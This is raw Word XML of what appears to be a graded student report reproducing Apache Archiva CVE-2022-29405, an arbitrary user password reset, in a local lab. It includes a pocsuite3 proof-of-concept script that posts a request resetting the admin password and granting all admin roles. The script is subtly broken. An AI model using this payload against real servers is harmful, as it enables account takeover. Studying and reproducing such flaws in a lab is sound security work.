              <w:ind w:firstLine="480" w:firstLineChars="20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环境搭建</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4696" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast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安装java</w:t>
            </w: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1.8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环境、burpsuite,设置浏览器代理；安装</w:t>
            </w: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archiva，配置端口为8000，在JDK1.8环境下运行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；安装pocsuite2.0.8,将guanxing模块放到pocsuite-thirdparty目录下,完成POC本地测试环境搭建。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4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="20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bookmarkStart w:id="0" w:name="_Hlk109311036"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>漏洞复现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4696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288" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"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①</w:t>
            </w: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越权漏洞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Apache Archiva 管理员创建的普通用户，其权限设置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"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是user-management-user-edit</w:t>
            </w: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在updateUser方法中，可以更新任意用户信息，因此普通用户可以调用上述接口，从而更新任意用户信息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4343" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast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 xml:space="preserve">    POC插件编写</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4696" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast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根据命令执行和文件上传POC的模板进行POC的编写。用burpsuite进行抓包，获得路径、数据、cookie等</w:t>
            </w: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，填写到P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OC</w:t>
            </w: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4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="20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平台提交</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4696" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast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登录3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60 POC++</w:t>
            </w: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平台，提交P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OC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p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2.4风险等级</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1888" w:tblpY="431"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8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1685"/>
        <w:gridCol w:w="5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432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编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685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风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5841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8" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1432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685" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="20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中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5841" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pP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Apache Archiva</w:t>
            </w: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中存在一个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任意用户密码重置漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>对于2.2.7以前的所有版本都存在，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管理员创建的普通用户，其权限设置不当，导致普通用户可以修改任意用户信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.漏洞复现过程（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）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①创建普通用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设置如下：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3090545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2011680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2957195" cy="2012950"/>
            <wp:effectExtent l="0" t="0" r="14605" b="13970"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="9" name="图片 9" descr="2b9c5e0694cc7d6aacb114a0f17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b9c5e0694cc7d6aacb114a0f1784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-34290</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1978025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2792730" cy="2106930"/>
            <wp:effectExtent l="0" t="0" r="11430" b="11430"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="8" name="图片 8" descr="5cbe1ccb831a88661dd025e82226a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cbe1ccb831a88661dd025e82226a8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②登录普通用户，并使用普通用户发送如下数据包：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3340735" cy="2951480"/>
            <wp:effectExtent l="0" t="0" r="12065" b="50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③使用管理员账户登录成功：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11525" cy="1779905"/>
            <wp:effectExtent l="0" t="0" r="10795" b="317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 w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1 风险管理及规避</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将环境下载到本地进行实验，不要对线上的运营中的网站进行测试，以免造成信息泄露干扰正常运营。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156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测试方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地搭建平台进行漏洞复现，在360指纹平台查询应用指纹，没有找到后提交指纹。通过在burpsuite抓包放包的方式编写poc代码，并在python2的pocsuite环境下测试poc代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156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测试中所用的工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ire</w:t>
      </w:r>
      <w:r>
        <w:t>fox-latest; pocsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>; kali-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>purple</w:t>
      </w:r>
      <w:r>
        <w:t>; burp suite professional v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2023.4.2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312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="4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b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结果（25分）</w:t>
      </w:r>
    </w:p>
    <w:p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4.1 POC插件编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cstheme="minorHAnsi"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"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# !/usr/bin/env python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# -*- coding: UTF-8 -*-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import random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import string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import calendar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import time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from urllib.parse import urlparse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from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE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from urllib.parse import quote,unquote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class TestPOC(POCBase):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vulID = '''CVE-2022-29405'''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cveID = ''''''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cnvdID = ''''''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cnnvdID = ''''''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version = ''''''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author = '''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体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By Wang</w:t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'''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vulDate = '''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体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2023/7/19</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/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'''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createDate = ''''''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updateDate = ''''''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name = ''''''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desc = ''''''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solution = ''''''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 xml:space="preserve">severity = ''''''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vulType = ''''''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taskType = ''''''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references = ['''''']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appName = ''''''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appVersion = ''''''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appPowerLink = ''''''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samples = ['']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install_requires = ['''''']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def _verify(self):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target = self.url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result = {}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cookie={"archiva_login":"%7B%22username%22%3A%22360test%22%2C%22password%22%3Anull%2C%22confirmPassword%22%3Anull%2C%22fullName%22%3A%22360test%22%2C%22email%22%3A%22360%40qq.com%22%2C%22permanent%22%3Afalse%2C%22validated%22%3Atrue%2C%22timestampAccountCreation%22%3Anull%2C%22timestampLastLogin%22%3Anull%2C%22timestampLastPasswordChange%22%3Anull%2C%22locked%22%3Afalse%2C%22passwordChangeRequired%22%3Afalse%2C%22assignedRoles%22%3A%5B%5D%2C%22modified%22%3Afalse%2C%22readOnly%22%3Afalse%2C%22userManagerId%22%3Anull%2C%22rememberme%22%3Afalse%2C%22logged%22%3Afalse%7D",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 xml:space="preserve">   "JSESSIONID":"qv12y6p7l7ie1c32walc96g84"}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headers = {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'Content-Type':'application/json',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'Cookie':cookie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path = "restServices/redbackServices/userService/updateUser " #漏洞的路径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vul_url = target+path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data = '"username":"admin","password":"s360360","confirmPassword":"s360360","fullName":"the administrator","email":"360@qq.com","permanent":true,"validated":true,"timestampAccountCreation":"ææä¸, 19 ä¸æ 2023 14:05:42 +0800 - 11 minutes ago","timestampLastLogin":null,"timestampLastPasswordChange":"ææä¸, 19 ä¸æ 2023 14:05:42 +0800 - 11 minutes ago","locked":false,"passwordChangeRequired":false,"assignedRoles":["Global Repository Manager","Global Repository Observer","Repository Manager - internal","Repository Manager - snapshots","Repository Observer - internal","Repository Observer - snapshots","System Administrator","User Administrator"],"modified":true,"readOnly":false,"userManagerId":"jdo","rememberme":false,"logged":false' #漏洞的data数据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 xml:space="preserve">resp = requests.post(target, headers = headers, data = data, verify = False, allow_redirects = False, timeout = 10) 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if resp.status_code == 200 or "user.password"  in resp.content: #判断条件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result['VerifyInfo'] = http_packet(resp)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result['VerifyInfo']['URL'] = vul_url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result['VerifyInfo']['result'] = resq.text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return self.parse_output(result)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def _attack(self):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return self._verify()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def parse_output(self, result):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output = Output(self)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if result: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output.success(result)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else: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output.fail('Failed')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ab/>
      </w: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return output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280" w:lineRule="exact"/>
        <w:textAlignment w:val="auto"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>register_poc(TestPOC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cstheme="minorHAnsi"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cstheme="minorHAnsi"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2 漏洞信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblW w:w="922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559"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="15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21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UVD-ID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漏洞类别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480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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越权操作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CVE-ID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480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia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2022-29405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2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280" w:lineRule="exact"/>
              <w:textAlignment w:val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披露/发现时间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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/7/18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bugtraq编号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CNNVD-ID：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480" w:lineRule="auto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21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提交时间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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/7/20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漏洞发现者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CNVD-ID：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480" w:lineRule="auto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21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漏洞等级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中危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提交者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exact"/>
              <w:textAlignment w:val="auto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王伯雅/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="2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exact"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman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李佳豪/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="21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spacing w:line="360" w:lineRule="exact"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi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刘哲泽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搜索关键词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480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>越权、密码重置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21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影响范围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2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
                <w:color w:val="333333"/>
                <w:sz w:val="25"/>
                <w:szCs w:val="25"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2.7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 xml:space="preserve"> 之前的所有版本（包括 2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
                <w:color w:val="333333"/>
                <w:sz w:val="25"/>
                <w:szCs w:val="25"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2.7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21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来源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480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>https://archiva.apache.org/docs/2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/release-notes.html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21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漏洞简介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480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"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Apache Archiva 管理员创建的普通用户，其权限设置不当，导致普通用户可以修改任意用户信息。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21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漏洞详情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48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hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>任意密码修改漏洞：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Apache Archiva 管理员创建的普通用户，其权限设置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"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是user-management-user-edit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsia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在updateUser方法中，可以更新任意用户信息，因此普通用户可以调用上述接口，从而更新任意用户信息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21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参考链接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1"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://archiva.apache.org/docs/2.2.8/release-notes.html" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="17"/>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>https://archiva.apache.org/docs/2.2.8/release-notes.html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi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靶场信息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</w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>本机搭建靶场，测试u</w:t>
            </w:r>
            <w:r>
              <w:t>rl: 127.0.0.1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POC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</w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>见上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修复方案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</w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请关注厂商并升级至最新版本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厂商链接：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"https://archiva.apache.org/"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7"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Archiva – The Build Artifact Repository Manager (apache.org)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</w:tbl>
    <w:p/>
    <w:p/>
    <w:p/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ource Sans Pro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b/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28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blL1DiwCAABW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eastAsia="等线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ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300">
          <wp:extent cx="899160" cy="359410"/>
          <wp:effectExtent l="0" t="0" r="0" b="635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916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0MTdmYTY2NGExYmRlNmIzN2E1ZTEyZDIxYTNmMDYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="05D969B9"/>
    <w:rsid w:val="00023E76"/>
    <w:rsid w:val="000A4895"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="0013116B"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="00192237"/>
    <w:rsid w:val="001B492D"/>
    <w:rsid w:val="001C66CC"/>
    <w:rsid w:val="001C77A4"/>
    <w:rsid w:val="00215411"/>
    <w:rsid w:val="0025116B"/>
    <w:rsid w:val="00314D29"/>
    <w:rsid w:val="00380909"/>
    <w:rsid w:val="003F0045"/>
    <w:rsid w:val="00435295"/>
    <w:rsid w:val="00475F3B"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="004F0203"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="00560A25"/>
    <w:rsid w:val="00595F40"/>
    <w:rsid w:val="005A758B"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="006D31AA"/>
    <w:rsid w:val="006D45D9"/>
    <w:rsid w:val="007971BF"/>
    <w:rsid w:val="007974C6"/>
    <w:rsid w:val="007A0A0C"/>
    <w:rsid w:val="007C3F48"/>
    <w:rsid w:val="007F5DE3"/>
